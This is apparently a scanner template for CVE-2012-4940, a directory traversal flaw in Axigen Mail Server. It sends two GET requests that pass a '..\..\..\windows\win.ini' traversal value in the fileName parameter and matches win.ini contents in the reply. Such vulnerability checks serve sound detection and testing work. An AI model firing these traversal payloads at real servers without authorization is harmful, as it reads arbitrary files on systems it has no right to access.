id: CVE-2012-4940 info: name: Axigen Mail Server - 'Filename' Directory Traversal author: dhiyaneshDk severity: high description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI. reference: https://www.exploit-db.com/exploits/37996 tags: cve,cve2012,axigen,lfi,mail requests: - method: GET path: - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini' - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini' stop-at-first-match: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and